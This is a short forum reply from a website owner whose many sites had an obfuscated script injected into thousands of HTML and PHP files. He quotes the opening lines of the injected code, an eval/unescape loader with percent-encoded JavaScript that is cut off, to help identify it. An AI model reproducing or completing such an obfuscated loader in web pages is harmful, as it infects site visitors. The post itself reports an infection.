Re: need a carwler

thanks pete for your reply
yes files are changed in the end of every html file, php file in each and
every folder on around 50 separate websites a large encrypted code or iframe
was injected

i have 400 folders in ftp in one site with index.php and all 400 index.php
files are injected with this code and this is just 1 site there are 30 more
ftp accounts with 50 or 100 folders having html or php files injected with
this code. the total affected files might be around 3000 - 5000 or more

i am writing below the starting few lines of the code that is injected maybe
someone else have seen this code before i have removed the script tag that
was in the start

<!-- ad -->window['eDvWa0lZ'.replace(/[ZWDz0]/g, '')]
(window['eDvWa0lZ'.replace(/[ZWDz0]/g, '')]
('u(nTeTsmc7aTpmem'.replace(/[h\(7mT]/g,
''))('%66%75%6e%63%74%69%6f%6e%20%41
%50%6c%4c%41%28%41%50%6c%6c%29%7b%66
%75%6e%63%74%69%6f%6e%20%41%41